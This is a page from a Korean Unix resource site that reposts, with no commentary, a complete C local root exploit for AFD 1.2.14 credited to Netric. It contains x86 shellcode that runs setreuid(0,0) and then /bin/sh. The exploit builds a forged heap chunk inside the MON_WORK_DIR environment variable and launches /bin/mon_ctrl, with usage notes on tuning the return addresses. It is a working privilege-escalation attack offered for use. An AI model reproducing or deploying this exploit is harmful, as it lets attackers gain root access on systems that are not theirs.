BACKRUSH 유닉스명령 다음 자료실 Ascii Table 원격접속 달력,시간 프로세스 쉘

지하철노선 RFC문서 SUN FAQ SUN FAQ1 C메뉴얼 PHP메뉴얼 너구리 아스키월드 아이피서치

글쓴이: ASSA

AFD 1.2.14 local root exploit

tjdrldud@hanmail.net
http://assa.backrush.com

/* AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)
* (Bug found by Sacrine (sacrine@netric.org)
* -----------------------------------------------------------------
* usage: ./afd-expl [retloc] [ret]
*
* This exploit overwrites a saved return address on the stack,
* so that 0xbfffe360, (that worked for me on Redhat 7.3) will
* probally not work for you...
*
* Just open the coredump, search the stack for 0x4207ac24,
* and substract that address with 0x0c.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
"\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */
"--netric--"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
"\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

int
main(int argc, char *argv[])
{
char buffer[1135];

unsigned int retloc = 0xbfffe360;
unsigned int ret = 0x0806f020; /* &shellcode */

if (argc > 1) retloc = strtoul(argv[1], &argv[1], 16);
if (argc > 2) ret = strtoul(argv[2], &argv[2], 16);

memset(buffer, 0x41, sizeof(buffer));
memcpy(buffer, "MON_WORK_DIR=",13);
memcpy(buffer+13, shellcode, strlen(shellcode));

buffer[1117] = 0xff; /* prev_size */
buffer[1118] = 0xff;
buffer[1119] = 0xff;
buffer[1120] = 0xff;

buffer[1121] = 0xfc; /* size field */
buffer[1122] = 0xff;
buffer[1123] = 0xff;
buffer[1124] = 0xff;

buffer[1126] = (retloc & 0x000000ff); /* FD */
buffer[1127] = (retloc & 0x0000ff00) >> 8;
buffer[1128] = (retloc & 0x00ff0000) >> 16;
buffer[1129] = (retloc & 0xff000000) >> 24;

buffer[1130] = (ret & 0x000000ff); /* BK */
buffer[1131] = (ret & 0x0000ff00) >> 8;
buffer[1132] = (ret & 0x00ff0000) >> 16;
buffer[1133] = (ret & 0xff000000) >> 24;

buffer[1134] = 0x0;
putenv(buffer);

fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n");
fprintf(stdout, "-----------------------------------------------------------------\n");
fprintf(stdout, "Ret = 0x%08x\n", ret);
fprintf(stdout, "Retloc = 0x%08x\n", retloc);

execl("/bin/mon_ctrl", "mon_ctrl", NULL);
return 0;
}